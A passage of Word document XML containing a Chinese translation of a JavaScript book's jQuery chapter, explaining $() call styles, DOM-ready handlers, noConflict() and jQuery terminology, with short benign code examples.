        <w:t>19.3</w:t>
      </w:r>
      <w:r>
        <w:t>节描述的</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>方法来轻松地将元素插入想要的地方。注意：在这种调用方式下，不可传入纯文本，因为</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>会把纯文本当成</w:t>
      </w:r>
      <w:r>
        <w:t>CSS</w:t>
      </w:r>
      <w:r>
        <w:t>选择器来解析。当使用这种调用风格时，</w:t>
      </w:r>
      <w:r>
        <w:t>传递给</w:t>
      </w:r>
      <w:r>
        <w:t>$()</w:t>
      </w:r>
      <w:r>
        <w:t>方法的字符串必须至少包含一个带有尖角括号的</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>标签。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>通过第三种方式调用时，</w:t>
      </w:r>
      <w:r>
        <w:t>$()</w:t>
      </w:r>
      <w:r>
        <w:t>接受可选的第二参数。可以传递</w:t>
      </w:r>
      <w:r>
        <w:t>Document</w:t>
      </w:r>
      <w:r>
        <w:t>对象来指定与所创建元素相关联的文档。（比如，当创建的元素需要插入</w:t>
      </w:r>
      <w:r>
        <w:t>iframe</w:t>
      </w:r>
      <w:r>
        <w:t>里时，需要显式指定该</w:t>
      </w:r>
      <w:r>
        <w:t>iframe</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>document</w:t>
      </w:r>
      <w:r>
        <w:t>对象。）第二参数还可以是</w:t>
      </w:r>
      <w:r>
        <w:t>object</w:t>
      </w:r>
      <w:r>
        <w:t>对象。此时，假设该对象的属性表示</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>属性的键</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:t>值对，这些属性将设置到所创建的对象上。当第二参数对象的属性名是</w:t>
      </w:r>
      <w:r>
        <w:t>"css"</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>"html"</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>"text"</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>"width"</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>"height"</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>"offset"</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>"v</w:t>
      </w:r>
      <w:r>
        <w:t>al"</w:t>
      </w:r>
      <w:r>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:t>"data"</w:t>
      </w:r>
      <w:r>
        <w:t>，或者属性名是</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>事件处理程序注册方法名时，</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>将调用新创建元素上的同名方法，并传入属性值。（</w:t>
      </w:r>
      <w:r>
        <w:t>css()</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>html()</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>text()</w:t>
      </w:r>
      <w:r>
        <w:t>等方法将在</w:t>
      </w:r>
      <w:r>
        <w:t>19.2</w:t>
      </w:r>
      <w:r>
        <w:t>节讲述，事件处理程序注册方法将在</w:t>
      </w:r>
      <w:r>
        <w:t>19.4</w:t>
      </w:r>
      <w:r>
        <w:t>节讲述。）例如：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var img=$("</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>img/</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>",//</w:t>
      </w:r>
      <w:r>
        <w:t>新建一个＜</w:t>
      </w:r>
      <w:r>
        <w:t>img</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>{src:url,//</w:t>
      </w:r>
      <w:r>
        <w:t>具有</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>属性</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>css:{borderWidth:5},//CSS</w:t>
      </w:r>
      <w:r>
        <w:t>样式</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>click:handleClick//</w:t>
      </w:r>
      <w:r>
        <w:t>和事件处理程序</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最后，第</w:t>
      </w:r>
      <w:r>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:t>种调用方式是传入一个函数给</w:t>
      </w:r>
      <w:r>
        <w:t>$(</w:t>
      </w:r>
      <w:r>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:t>方法。此时，当文档加载完毕且</w:t>
      </w:r>
      <w:r>
        <w:t>DOM</w:t>
      </w:r>
      <w:r>
        <w:t>可操作时，传入的函数将被调用。这是例</w:t>
      </w:r>
      <w:r>
        <w:t>13-5</w:t>
      </w:r>
      <w:r>
        <w:t>中</w:t>
      </w:r>
      <w:r>
        <w:t>onLoad()</w:t>
      </w:r>
      <w:r>
        <w:t>函数的</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>版本。在</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>程序中，在</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery()</w:t>
      </w:r>
      <w:r>
        <w:t>里定义一个匿名函数非常常见：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>jQuery(function(){//</w:t>
      </w:r>
      <w:r>
        <w:t>文档加载完毕时调用</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>所有</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>代码放在这里</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有时还可以看见</w:t>
      </w:r>
      <w:r>
        <w:t>$(f)</w:t>
      </w:r>
      <w:r>
        <w:t>的老式和完整写法：</w:t>
      </w:r>
      <w:r>
        <w:t>$(document).ready(f)</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>传给</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery()</w:t>
      </w:r>
      <w:r>
        <w:t>的函数在被调用时，</w:t>
      </w:r>
      <w:r>
        <w:t>this</w:t>
      </w:r>
      <w:r>
        <w:t>指向</w:t>
      </w:r>
      <w:r>
        <w:t>document</w:t>
      </w:r>
      <w:r>
        <w:t>对象，唯一的参数指向</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>函数。这意味着可以释放全局的</w:t>
      </w:r>
      <w:r>
        <w:t>$(</w:t>
      </w:r>
      <w:r>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:t>函数，但在内部依旧可以延续该习惯：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>jQuery.noConflict();//</w:t>
      </w:r>
      <w:r>
        <w:t>还原</w:t>
      </w:r>
      <w:r>
        <w:t>$()</w:t>
      </w:r>
      <w:r>
        <w:t>为初始值</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>jQuery(function($){//</w:t>
      </w:r>
      <w:r>
        <w:t>让</w:t>
      </w:r>
      <w:r>
        <w:t>$()</w:t>
      </w:r>
      <w:r>
        <w:t>成为</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>对象的局部别名</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>代码放在这里</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通过</w:t>
      </w:r>
      <w:r>
        <w:t>$()</w:t>
      </w:r>
      <w:r>
        <w:t>注册的函数将在</w:t>
      </w:r>
      <w:r>
        <w:t>DOMContentLoaded</w:t>
      </w:r>
      <w:r>
        <w:t>事件触发时由</w:t>
      </w:r>
      <w:r>
        <w:t>jQurey</w:t>
      </w:r>
      <w:r>
        <w:t>触发。当浏览器不支持该事件时，会在</w:t>
      </w:r>
      <w:r>
        <w:t>load</w:t>
      </w:r>
      <w:r>
        <w:t>事件触发时由</w:t>
      </w:r>
      <w:r>
        <w:t>jQurey</w:t>
      </w:r>
      <w:r>
        <w:t>触发。这意味着文档已经解析完毕，但图片等外部资源有可能还未加载。如果在</w:t>
      </w:r>
      <w:r>
        <w:t>DOM</w:t>
      </w:r>
      <w:r>
        <w:t>准备就绪后再传递函数给</w:t>
      </w:r>
      <w:r>
        <w:t>$()</w:t>
      </w:r>
      <w:r>
        <w:t>，传递的函数会在</w:t>
      </w:r>
      <w:r>
        <w:t>$()</w:t>
      </w:r>
      <w:r>
        <w:t>返回之前立刻调用。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>类库还使用</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery()</w:t>
      </w:r>
      <w:r>
        <w:t>函数作为其命名空间，在下面定义了不少工具函数和属性。上面提到过的</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery.noConflict()</w:t>
      </w:r>
      <w:r>
        <w:t>就是其中一个工具函数。还包括用于通用遍历的</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery.each()</w:t>
      </w:r>
      <w:r>
        <w:t>，以及用来解</w:t>
      </w:r>
      <w:r>
        <w:t>析</w:t>
      </w:r>
      <w:r>
        <w:t>JSON</w:t>
      </w:r>
      <w:r>
        <w:t>文本的</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery.parseJSON()</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
      <w:r>
        <w:t>19.7</w:t>
      </w:r>
      <w:r>
        <w:t>节列举了这些通用工具函数，</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>的其他函数在本章中都会提及。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para07"/>
      </w:pPr>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>术语</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para05"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>在本章中将会遇到一些重要的术语和短语，我们来看一下其定义：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para05"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>“jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>函数</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para05"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>函数是</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:t>$()</w:t>
      </w:r>
      <w:r>
        <w:t>的值。该函数可以用来创建</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>对象，用来注册</w:t>
      </w:r>
      <w:r>
        <w:t>DOM</w:t>
      </w:r>
      <w:r>
        <w:t>就绪时需要调用的处理程序，还用做</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>命名空间。</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>我通常用</w:t>
      </w:r>
      <w:r>
        <w:t>$()</w:t>
      </w:r>
      <w:r>
        <w:t>来引用它。它可以用做命名空间，因此</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>函数也可称为</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>全局</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>对象</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>，但要注意千万别把它与</w:t>
      </w:r>
      <w:r>
        <w:t>“jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>对象</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>混淆。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para05"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>“jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>对象</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para05"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>对象是由</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>函数返回的对象。一个</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>对象表示一组文档元素，也叫做</w:t>
      </w:r>
      <w:r>
        <w:t>“jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>结果</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>“jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>集</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>包装集</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para05"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>选中元素</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para05"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>当传递</w:t>
      </w:r>
      <w:r>
        <w:t>CSS</w:t>
      </w:r>
      <w:r>
        <w:t>选择器给</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>函</w:t>
      </w:r>
      <w:r>
        <w:t>数时，它返回的</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>对象表示匹配该选择器的文档元素集。在描述</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>对象的方法时，我经常会使用</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>选中元素</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>这个说法，用来指代这些匹配的元素。例如，为了解释</w:t>
      </w:r>
      <w:r>
        <w:t>attr()</w:t>
      </w:r>
      <w:r>
        <w:t>方法，我会用</w:t>
      </w:r>
      <w:r>
        <w:t>“attr()</w:t>
      </w:r>
      <w:r>
        <w:t>方法给选中元素设置</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>属性</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>，用来替代更精确但很冗长的描述：</w:t>
      </w:r>
      <w:r>
        <w:t>“attr()</w:t>
      </w:r>
      <w:r>
        <w:t>方法给调用它时所在的</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>对象的元素设置</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>属性</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>。注意</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>选中</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>是指</w:t>
      </w:r>
      <w:r>
        <w:t>CSS</w:t>
      </w:r>
      <w:r>
        <w:t>选择器，与用户执行的操作没有任何关系。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para05"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>“jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>函数</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para05"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>函数指定义在</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>命名空间中的函数，比如</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery.noConfl</w:t>
      </w:r>
      <w:r>
        <w:t>ict()</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>函数也可称为</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>静态方法</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para05"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>“jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>方法</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para05"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>方法是由</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>函数返回的</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>对象的方法。</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>类库最重要的部分就是它定义的这些强大的方法。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para05"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>函数和</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>方法有时很难区分，因为有部分函数和方法的名称是一样的。注意下面这两行代码的差异：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>each()</w:t>
      </w:r>
      <w:r>
        <w:t>函数用来</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>对数组</w:t>
      </w:r>
      <w:r>
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:t>中的每一个元素都调用一次函数</w:t>
      </w:r>
      <w:r>
        <w:t>f</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>$.each(a,f);//</w:t>
      </w:r>
      <w:r>
        <w:t>调用</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery()</w:t>
      </w:r>
      <w:r>
        <w:t>函数获取表示文档中所有＜</w:t>
      </w:r>
      <w:r>
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素的</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>对象</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>然后调用该</w:t>
      </w:r>
      <w:r>
        <w:t>j</w:t>
      </w:r>
      <w:r>
        <w:t>Qurey</w:t>
      </w:r>
      <w:r>
        <w:t>对象的</w:t>
      </w:r>
      <w:r>
        <w:t>each()</w:t>
      </w:r>
      <w:r>
        <w:t>方法</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>对选中的每一个元素调用一次函数</w:t>
      </w:r>
      <w:r>
        <w:t>f</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>$("a").each(f);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para05"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>http://jquery.com</w:t>
      </w:r>
      <w:r>
        <w:t>中的</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>官方文档使用类似</w:t>
      </w:r>
      <w:r>
        <w:t>$.each</w:t>
      </w:r>
      <w:r>
        <w:t>的命名来表示</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>函数，用类似</w:t>
      </w:r>
      <w:r>
        <w:t>.each</w:t>
      </w:r>
      <w:r>
        <w:t>（带点号但不带美元符号）的命名来表示</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>方法。在本书中，会使用术语</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>函数</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>方法</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>来指代。一般情况下，根据讨论的上下文可以清晰地区分开。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="319" w:after="319"/>
      </w:pPr>
      <w:bookmarkStart w:id="464" w:name="19_1_2_Cha_Xun_Yu_Cha_Xun_Jie_Guo_"/>
      <w:r>
        <w:t>19.1.2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　查询与查询结果</w:t>
      </w:r>
      <w:bookmarkEnd w:id="464"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>传递</w:t>
      </w:r>
      <w:r>
        <w:t>CSS</w:t>
      </w:r>
      <w:r>
        <w:t>选择器字符串给</w:t>
      </w:r>
      <w:r>
        <w:t>$()</w:t>
      </w:r>
      <w:r>
        <w:t>，它返回的</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>对象表示匹配（或称为</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>选中</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>）的元素集。</w:t>
      </w:r>
      <w:r>
        <w:t>CSS</w:t>
      </w:r>
      <w:r>
        <w:t>选择器在</w:t>
      </w:r>
      <w:r>
        <w:t>15.2.5</w:t>
      </w:r>
      <w:r>
        <w:t>节介绍过，你可以温习下</w:t>
      </w:r>
      <w:r>
        <w:t>15.2.5</w:t>
      </w:r>
      <w:r>
